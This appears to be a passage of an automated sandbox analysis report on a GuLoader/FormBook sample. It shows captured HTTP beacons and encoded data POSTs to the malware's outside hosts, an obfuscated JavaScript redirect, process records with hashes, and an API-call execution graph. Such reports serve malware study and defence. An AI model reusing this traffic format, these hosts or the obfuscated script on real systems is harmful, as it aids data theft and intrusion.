                                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 46 91 b9 41 b9 3e b9 7e 79 be 21 81 55 49 99 a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 75 fe 5f 5d 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 67)N.,(ON,VPV/Ji%IAf>FA>~y!UIf~Y&6Pu_]Z0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                74 | 192.168.11.20 | 49817 | 154.88.22.105 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:02:28.102202892 CET | 452 | OUT | GET /sp9i/?2WLcH=/yY+7m1AZbgb0K2/LwtBLxCjXaU0b9j5Pi53FyGdgcs4UrSukFrrBxiVM6k9vqLarsWUeALRJhCd8Ws3EraXiGfQePxT8U++C5GowWJeifl9yaVeP5ongLY=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.cg19g5.pro
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:02:28.406161070 CET | 332 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:02:28 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Data Raw: 35 37 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 38 32 59 6d 52 6d 4c 6d 4e 6e 4d 54 51 7a 62 69 35 77 63 6d 38 36 4e 6a 59 34 4f 51 3d 3d 27 29 3c 2f 73 63 72 69 0d 0a 33 0d 0a 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 57<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly82YmRmLmNnMTQzbi5wcm86NjY4OQ==')</scri3pt>0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                75 | 192.168.11.20 | 49818 | 43.155.76.124 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:02:33.742006063 CET | 718 | OUT | POST /gzx8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nuy25c9t.sbs
                                                                                Origin: http://www.nuy25c9t.sbs
                                                                                Referer: http://www.nuy25c9t.sbs/gzx8/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=+YME3s+bZICNT7W+3f4+xAaXLbMeUuTgWCmVa6ZBAFLqI8ySZ35JTjURYQG4o3V1GoPOgzXaISIwO3Ac9Sqd66bWGQCC063f/vo23AO0EfJvvDhtyOmbDZ7dzpuYp+ENxFA+FEo/wwJ2Pk1V7St54r/3jG5DIHtAkt2Lif83+CM6rNpZfOzt+fPYFjGr0baNzA==
                                                                                Nov 25, 2024 12:02:34.062474966 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                                Server: Tengine
                                                                                Date: Mon, 25 Nov 2024 11:02:33 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                76 | 192.168.11.20 | 49819 | 43.155.76.124 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:02:36.583499908 CET | 738 | OUT | POST /gzx8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nuy25c9t.sbs
                                                                                Origin: http://www.nuy25c9t.sbs
                                                                                Referer: http://www.nuy25c9t.sbs/gzx8/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:02:36.902487993 CET  306  IN  HTTP/1.1 404 Not Found
                                                                                Server: Tengine
                                                                                Date: Mon, 25 Nov 2024 11:02:36 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                                77          192.168.11.20  49820        43.155.76.124   80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Nov 25, 2024 12:02:39.428847075 CET  6445  OUT  POST /gzx8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nuy25c9t.sbs
                                                                                Origin: http://www.nuy25c9t.sbs
                                                                                Referer: http://www.nuy25c9t.sbs/gzx8/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:02:39.428934097 CET  1442  OUT
                                                                                Nov 25, 2024 12:02:39.750567913 CET  306  IN  HTTP/1.1 404 Not Found
                                                                                Server: Tengine
                                                                                Date: Mon, 25 Nov 2024 11:02:39 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                                78          192.168.11.20  49821        43.155.76.124   80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Nov 25, 2024 12:02:42.273834944 CET  454  OUT  GET /gzx8/?2WLcH=zakk0Z6QX+PeMKuO9doP3TuSH4tsROWjUg+AcMIBC3jNAdeJcFpvchgVbxSCnVd2G7blpBbqDXciYyMV8Uav3uCQEiSaobLJsegQ2xqoFvZbzlxviNb8bJg=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.nuy25c9t.sbs
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:02:42.597754002 CET  306  IN  HTTP/1.1 404 Not Found
                                                                                Server: Tengine
                                                                                Date: Mon, 25 Nov 2024 11:02:42 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>



                                                                                Target ID:0
                                                                                Start time:05:54:51
                                                                                Start date:25/11/2024
                                                                                Path:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"
                                                                                Imagebase:0x400000
                                                                                File size:974'630 bytes
                                                                                MD5 hash:936FD06CF63ED725BDB6BC4C83BED228
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.33323827525.000000000825E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:05:56:46
                                                                                Start date:25/11/2024
                                                                                Path:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"
                                                                                Imagebase:0x400000
                                                                                File size:974'630 bytes
                                                                                MD5 hash:936FD06CF63ED725BDB6BC4C83BED228
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.33603243074.0000000037400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:05:57:04
                                                                                Start date:25/11/2024
                                                                                Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                Imagebase:0x140000000
                                                                                File size:16'696'840 bytes
                                                                                MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:4
                                                                                Start time:05:57:06
                                                                                Start date:25/11/2024
                                                                                Path:C:\Windows\SysWOW64\sdchange.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\sdchange.exe"
                                                                                Imagebase:0xd0000
                                                                                File size:40'960 bytes
                                                                                MD5 hash:8E93B557363D8400A8B9F2D70AEB222B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.36984586192.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.36984512971.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:5
                                                                                Start time:05:57:31
                                                                                Start date:25/11/2024
                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                Imagebase:0x7ff629a20000
                                                                                File size:597'432 bytes
                                                                                MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                  Execution Graph

                                                                                  Execution Coverage:18.5%
                                                                                  Dynamic/Decrypted Code Coverage:13.5%
                                                                                  Signature Coverage:20.1%
                                                                                  Total number of Nodes:1567
                                                                                  Total number of Limit Nodes:35
5038 405ba5 2 API calls 5037->5038 5039 402f49 5038->5039 5138 406284 lstrcpynW 5039->5138 5041 402f54 GetFileSize 5042 403050 5041->5042 5060 402f6b 5041->5060 5139 402e79 5042->5139 5044 403059 5046 403089 GlobalAlloc 5044->5046 5044->5055 5151 403311 SetFilePointer 5044->5151 5045 4032fb ReadFile 5045->5060 5150 403311 SetFilePointer 5046->5150 5048 4030bc 5052 402e79 6 API calls 5048->5052 5050 403072 5053 4032fb ReadFile 5050->5053 5051 4030a4 5054 403116 35 API calls 5051->5054 5052->5055 5056 40307d 5053->5056 5058 4030b0 5054->5058 5055->4960 5056->5046 5056->5055 5057 402e79 6 API calls 5057->5060 5058->5055 5058->5058 5059 4030ed SetFilePointer 5058->5059 5059->5055 5060->5042 5060->5045 5060->5048 5060->5055 5060->5057 5062 40665e 5 API calls 5061->5062 5063 403988 5062->5063 5064 4039a0 5063->5064 5065 40398e 5063->5065 5066 406152 3 API calls 5064->5066 5164 4061cb wsprintfW 5065->5164 5067 4039d0 5066->5067 5069 4039ef lstrcatW 5067->5069 5071 406152 3 API calls 5067->5071 5070 40399e 5069->5070 5156 403c4a 5070->5156 5071->5069 5074 405c61 18 API calls 5075 403a21 5074->5075 5076 403ab5 5075->5076 5078 406152 3 API calls 5075->5078 5077 405c61 18 API calls 5076->5077 5079 403abb 5077->5079 5080 403a53 5078->5080 5081 403acb LoadImageW 5079->5081 5082 4062a6 17 API calls 5079->5082 5080->5076 5085 403a74 lstrlenW 5080->5085 5088 405b86 CharNextW 5080->5088 5083 403b71 5081->5083 5084 403af2 RegisterClassW 5081->5084 5082->5081 5087 40140b 2 API calls 5083->5087 5086 403b28 SystemParametersInfoW CreateWindowExW 5084->5086 5116 403b7b 5084->5116 5089 403a82 lstrcmpiW 5085->5089 5090 403aa8 5085->5090 5086->5083 5091 403b77 5087->5091 5093 403a71 5088->5093 5089->5090 5094 403a92 GetFileAttributesW 5089->5094 5092 405b59 3 API calls 5090->5092 5095 403c4a 18 API calls 5091->5095 5091->5116 5096 403aae 5092->5096 5093->5085 5097 403a9e 5094->5097 5098 403b88 5095->5098 5165 406284 lstrcpynW 5096->5165 5097->5090 5100 405ba5 2 API calls 5097->5100 5101 
403b94 ShowWindow 5098->5101 5102 403c17 5098->5102 5100->5090 5104 4065ee 3 API calls 5101->5104 5103 4053bf 5 API calls 5102->5103 5105 403c1d 5103->5105 5106 403bac 5104->5106 5107 403c21 5105->5107 5108 403c39 5105->5108 5109 403bba GetClassInfoW 5106->5109 5111 4065ee 3 API calls 5106->5111 5114 40140b 2 API calls 5107->5114 5107->5116 5110 40140b 2 API calls 5108->5110 5112 403be4 DialogBoxParamW 5109->5112 5113 403bce GetClassInfoW RegisterClassW 5109->5113 5110->5116 5111->5109 5115 40140b 2 API calls 5112->5115 5113->5112 5114->5116 5115->5116 5116->4963 5117->4966 5118->4999 5119->4967 5121 4038b2 5120->5121 5122 4038a4 CloseHandle 5120->5122 5167 4038df 5121->5167 5122->5121 5125 405996 67 API calls 5126 4036cd OleUninitialize 5125->5126 5126->4974 5126->4975 5127->5008 5128->5018 5130 4058a0 CloseHandle 5129->5130 5131 4058ac 5129->5131 5130->5131 5131->5018 5133 405db6 GetTickCount GetTempFileNameW 5132->5133 5134 403357 5133->5134 5135 405dec 5133->5135 5134->4953 5135->5133 5135->5134 5136->5035 5137->5037 5138->5041 5140 402e82 5139->5140 5141 402e9a 5139->5141 5142 402e92 5140->5142 5143 402e8b DestroyWindow 5140->5143 5144 402ea2 5141->5144 5145 402eaa GetTickCount 5141->5145 5142->5044 5143->5142 5152 40669a 5144->5152 5147 402eb8 CreateDialogParamW ShowWindow 5145->5147 5148 402edb 5145->5148 5147->5148 5148->5044 5150->5051 5151->5050 5153 4066b7 PeekMessageW 5152->5153 5154 402ea8 5153->5154 5155 4066ad DispatchMessageW 5153->5155 5154->5044 5155->5153 5157 403c5e 5156->5157 5166 4061cb wsprintfW 5157->5166 5159 403ccf 5160 403d03 18 API calls 5159->5160 5162 403cd4 5160->5162 5161 4039ff 5161->5074 5162->5161 5163 4062a6 17 API calls 5162->5163 5163->5162 5164->5070 5165->5076 5166->5159 5168 4038ed 5167->5168 5169 4038b7 5168->5169 5170 4038f2 FreeLibrary GlobalFree 5168->5170 5169->5125 5170->5169 5170->5170 5301 402259 5302 402c41 17 API calls 5301->5302 5303 40225f 5302->5303 5304 402c41 17 API calls 5303->5304 5305 402268 5304->5305 5306 
402c41 17 API calls 5305->5306 5307 402271 5306->5307 5308 4065c7 2 API calls 5307->5308 5309 40227a 5308->5309 5310 40228b lstrlenW lstrlenW 5309->5310 5311 40227e 5309->5311 5313 4052ec 24 API calls 5310->5313 5312 4052ec 24 API calls 5311->5312 5315 402286 5312->5315 5314 4022c9 SHFileOperationW 5313->5314 5314->5311 5314->5315 5171 40175c 5172 402c41 17 API calls 5171->5172 5173 401763 5172->5173 5174 405da9 2 API calls 5173->5174 5175 40176a 5174->5175 5176 405da9 2 API calls 5175->5176 5176->5175 5323 401d5d GetDlgItem GetClientRect 5324 402c41 17 API calls 5323->5324 5325 401d8f LoadImageW SendMessageW 5324->5325 5326 401dad DeleteObject 5325->5326 5327 402ac5 5325->5327 5326->5327 5328 4022dd 5329 4022e4 5328->5329 5332 4022f7 5328->5332 5330 4062a6 17 API calls 5329->5330 5331 4022f1 5330->5331 5333 4058ea MessageBoxIndirectW 5331->5333 5333->5332 5334 70502c4f 5335 70502c67 5334->5335 5336 7050158f 2 API calls 5335->5336 5337 70502c82 5336->5337 5338 405260 5339 405270 5338->5339 5340 405284 5338->5340 5341 405276 5339->5341 5350 4052cd 5339->5350 5342 40528c IsWindowVisible 5340->5342 5348 4052a3 5340->5348 5344 404247 SendMessageW 5341->5344 5345 405299 5342->5345 5342->5350 5343 4052d2 CallWindowProcW 5346 405280 5343->5346 5344->5346 5351 404bb6 SendMessageW 5345->5351 5348->5343 5356 404c36 5348->5356 5350->5343 5352 404c15 SendMessageW 5351->5352 5353 404bd9 GetMessagePos ScreenToClient SendMessageW 5351->5353 5354 404c0d 5352->5354 5353->5354 5355 404c12 5353->5355 5354->5348 5355->5352 5365 406284 lstrcpynW 5356->5365 5358 404c49 5366 4061cb wsprintfW 5358->5366 5360 404c53 5361 40140b 2 API calls 5360->5361 5362 404c5c 5361->5362 5367 406284 lstrcpynW 5362->5367 5364 404c63 5364->5350 5365->5358 5366->5360 5367->5364 5368 70501671 5369 70501516 GlobalFree 5368->5369 5371 70501689 5369->5371 5370 705016cf GlobalFree 5371->5370 5372 705016a4 5371->5372 5373 705016bb VirtualFree 5371->5373 5372->5370 5373->5370 5374 401563 5375 402a6b 5374->5375 
5378 4061cb wsprintfW 5375->5378 5377 402a70 5378->5377 4489 4023e4 4490 402c41 17 API calls 4489->4490 4491 4023f6 4490->4491 4492 402c41 17 API calls 4491->4492 4493 402400 4492->4493 4506 402cd1 4493->4506 4496 402438 4498 402444 4496->4498 4510 402c1f 4496->4510 4497 402c41 17 API calls 4500 40242e lstrlenW 4497->4500 4502 402463 RegSetValueExW 4498->4502 4513 403116 4498->4513 4499 40288b 4500->4496 4503 402479 RegCloseKey 4502->4503 4503->4499 4507 402cec 4506->4507 4534 40611f 4507->4534 4511 4062a6 17 API calls 4510->4511 4512 402c34 4511->4512 4512->4498 4514 40312f 4513->4514 4515 40315a 4514->4515 4548 403311 SetFilePointer 4514->4548 4538 4032fb 4515->4538 4519 403177 GetTickCount 4530 40318a 4519->4530 4520 40329b 4521 40329f 4520->4521 4526 4032b7 4520->4526 4523 4032fb ReadFile 4521->4523 4522 403285 4522->4502 4523->4522 4524 4032fb ReadFile 4524->4526 4525 4032fb ReadFile 4525->4530 4526->4522 4526->4524 4527 405e2c WriteFile 4526->4527 4527->4526 4529 4031f0 GetTickCount 4529->4530 4530->4522 4530->4525 4530->4529 4531 403219 MulDiv wsprintfW 4530->4531 4533 405e2c WriteFile 4530->4533 4541 4067df 4530->4541 4532 4052ec 24 API calls 4531->4532 4532->4530 4533->4530 4535 40612e 4534->4535 4536 402410 4535->4536 4537 406139 RegCreateKeyExW 4535->4537 4536->4496 4536->4497 4536->4499 4537->4536 4539 405dfd ReadFile 4538->4539 4540 403165 4539->4540 4540->4519 4540->4520 4540->4522 4542 406804 4541->4542 4543 40680c 4541->4543 4542->4530 4543->4542 4544 406893 GlobalFree 4543->4544 4545 40689c GlobalAlloc 4543->4545 4546 406913 GlobalAlloc 4543->4546 4547 40690a GlobalFree 4543->4547 4544->4545 4545->4542 4545->4543 4546->4542 4546->4543 4547->4546 4548->4515 5379 404c68 GetDlgItem GetDlgItem 5380 404cba 7 API calls 5379->5380 5392 404ed3 5379->5392 5381 404d50 SendMessageW 5380->5381 5382 404d5d DeleteObject 5380->5382 5381->5382 5383 404d66 5382->5383 5385 404d9d 5383->5385 5386 4062a6 17 API calls 5383->5386 5384 404fb7 5388 405063 5384->5388 5394 
404ec6 5384->5394 5399 405010 SendMessageW 5384->5399 5387 4041fb 18 API calls 5385->5387 5389 404d7f SendMessageW SendMessageW 5386->5389 5393 404db1 5387->5393 5390 405075 5388->5390 5391 40506d SendMessageW 5388->5391 5389->5383 5401 405087 ImageList_Destroy 5390->5401 5402 40508e 5390->5402 5410 40509e 5390->5410 5391->5390 5392->5384 5397 404bb6 5 API calls 5392->5397 5413 404f44 5392->5413 5398 4041fb 18 API calls 5393->5398 5395 404262 8 API calls 5394->5395 5400 405259 5395->5400 5396 404fa9 SendMessageW 5396->5384 5397->5413 5414 404dbf 5398->5414 5399->5394 5404 405025 SendMessageW 5399->5404 5401->5402 5405 405097 GlobalFree 5402->5405 5402->5410 5403 40520d 5403->5394 5408 40521f ShowWindow GetDlgItem ShowWindow 5403->5408 5407 405038 5404->5407 5405->5410 5406 404e94 GetWindowLongW SetWindowLongW 5409 404ead 5406->5409 5415 405049 SendMessageW 5407->5415 5408->5394 5411 404eb3 ShowWindow 5409->5411 5412 404ecb 5409->5412 5410->5403 5420 404c36 4 API calls 5410->5420 5423 4050d9 5410->5423 5430 404230 SendMessageW 5411->5430 5431 404230 SendMessageW 5412->5431 5413->5384 5413->5396 5414->5406 5416 404e8e 5414->5416 5419 404e0f SendMessageW 5414->5419 5421 404e4b SendMessageW 5414->5421 5422 404e5c SendMessageW 5414->5422 5415->5388 5416->5406 5416->5409 5419->5414 5420->5423 5421->5414 5422->5414 5425 40511d 5423->5425 5426 405107 SendMessageW 5423->5426 5424 4051e3 InvalidateRect 5424->5403 5427 4051f9 5424->5427 5425->5424 5429 405191 SendMessageW SendMessageW 5425->5429 5426->5425 5432 404b71 5427->5432 5429->5425 5430->5394 5431->5392 5435 404aa8 5432->5435 5434 404b86 5434->5403 5436 404ac1 5435->5436 5437 4062a6 17 API calls 5436->5437 5438 404b25 5437->5438 5439 4062a6 17 API calls 5438->5439 5440 404b30 5439->5440 5441 4062a6 17 API calls 5440->5441 5442 404b46 lstrlenW wsprintfW SetDlgItemTextW 5441->5442 5442->5434 5443 402868 5444 402c41 17 API calls 5443->5444 5445 40286f FindFirstFileW 5444->5445 5446 402882 5445->5446 5447 402897 
5445->5447 5451 4061cb wsprintfW 5447->5451 5449 4028a0 5452 406284 lstrcpynW 5449->5452 5451->5449 5452->5446 5453 401968 5454 402c1f 17 API calls 5453->5454 5455 40196f 5454->5455 5456 402c1f 17 API calls 5455->5456 5457 40197c 5456->5457 5458 402c41 17 API calls 5457->5458 5459 401993 lstrlenW 5458->5459 5461 4019a4 5459->5461 5460 4019e5 5461->5460 5465 406284 lstrcpynW 5461->5465 5463 4019d5 5463->5460 5464 4019da lstrlenW 5463->5464 5464->5460 5465->5463 5466 40166a 5467 402c41 17 API calls 5466->5467 5468 401670 5467->5468 5469 4065c7 2 API calls 5468->5469 5470 401676 5469->5470 5471 40436b lstrlenW 5472 40438a 5471->5472 5473 40438c WideCharToMultiByte 5471->5473 5472->5473 5474 4046ec 5475 404718 5474->5475 5476 404729 5474->5476 5535 4058ce GetDlgItemTextW 5475->5535 5478 404735 GetDlgItem 5476->5478 5484 404794 5476->5484 5480 404749 5478->5480 5479 404723 5482 406518 5 API calls 5479->5482 5483 40475d SetWindowTextW 5480->5483 5488 405c04 4 API calls 5480->5488 5481 404878 5485 404a27 5481->5485 5537 4058ce GetDlgItemTextW 5481->5537 5482->5476 5489 4041fb 18 API calls 5483->5489 5484->5481 5484->5485 5490 4062a6 17 API calls 5484->5490 5487 404262 8 API calls 5485->5487 5492 404a3b 5487->5492 5493 404753 5488->5493 5494 404779 5489->5494 5495 404808 SHBrowseForFolderW 5490->5495 5491 4048a8 5496 405c61 18 API calls 5491->5496 5493->5483 5502 405b59 3 API calls 5493->5502 5497 4041fb 18 API calls 5494->5497 5495->5481 5498 404820 CoTaskMemFree 5495->5498 5499 4048ae 5496->5499 5500 404787 5497->5500 5501 405b59 3 API calls 5498->5501 5538 406284 lstrcpynW 5499->5538 5536 404230 SendMessageW 5500->5536 5504 40482d 5501->5504 5502->5483 5507 404864 SetDlgItemTextW 5504->5507 5511 4062a6 17 API calls 5504->5511 5506 40478d 5509 40665e 5 API calls 5506->5509 5507->5481 5508 4048c5 5510 40665e 5 API calls 5508->5510 5509->5484 5518 4048cc 5510->5518 5512 40484c lstrcmpiW 5511->5512 5512->5507 5515 40485d lstrcatW 5512->5515 5513 40490d 5539 406284 lstrcpynW 
5513->5539 5515->5507 5516 404914 5517 405c04 4 API calls 5516->5517 5519 40491a GetDiskFreeSpaceW 5517->5519 5518->5513 5522 405ba5 2 API calls 5518->5522 5524 404965 5518->5524 5521 40493e MulDiv 5519->5521 5519->5524 5521->5524 5522->5518 5523 4049d6 5526 4049f9 5523->5526 5528 40140b 2 API calls 5523->5528 5524->5523 5525 404b71 20 API calls 5524->5525 5527 4049c3 5525->5527 5540 40421d KiUserCallbackDispatcher 5526->5540 5529 4049d8 SetDlgItemTextW 5527->5529 5530 4049c8 5527->5530 5528->5526 5529->5523 5533 404aa8 20 API calls 5530->5533 5532 404a15 5532->5485 5541 404645 5532->5541 5533->5523 5535->5479 5536->5506 5537->5491 5538->5508 5539->5516 5540->5532 5542 404653 5541->5542 5543 404658 SendMessageW 5541->5543 5542->5543 5543->5485 4667 40176f 4668 402c41 17 API calls 4667->4668 4669 401776 4668->4669 4670 401796 4669->4670 4671 40179e 4669->4671 4707 406284 lstrcpynW 4670->4707 4708 406284 lstrcpynW 4671->4708 4674 40179c 4678 406518 5 API calls 4674->4678 4675 4017a9 4676 405b59 3 API calls 4675->4676 4677 4017af lstrcatW 4676->4677 4677->4674 4683 4017bb 4678->4683 4679 4017f7 4681 405d55 2 API calls 4679->4681 4680 4065c7 2 API calls 4680->4683 4681->4683 4683->4679 4683->4680 4684 4017cd CompareFileTime 4683->4684 4685 40188d 4683->4685 4688 406284 lstrcpynW 4683->4688 4694 4062a6 17 API calls 4683->4694 4703 401864 4683->4703 4706 405d7a GetFileAttributesW CreateFileW 4683->4706 4709 4058ea 4683->4709 4684->4683 4686 4052ec 24 API calls 4685->4686 4689 401897 4686->4689 4687 4052ec 24 API calls 4705 401879 4687->4705 4688->4683 4690 403116 35 API calls 4689->4690 4691 4018aa 4690->4691 4692 4018be SetFileTime 4691->4692 4693 4018d0 CloseHandle 4691->4693 4692->4693 4695 4018e1 4693->4695 4693->4705 4694->4683 4696 4018e6 4695->4696 4697 4018f9 4695->4697 4698 4062a6 17 API calls 4696->4698 4699 4062a6 17 API calls 4697->4699 4701 4018ee lstrcatW 4698->4701 4702 401901 4699->4702 4701->4702 4704 4058ea MessageBoxIndirectW 4702->4704 4703->4687 
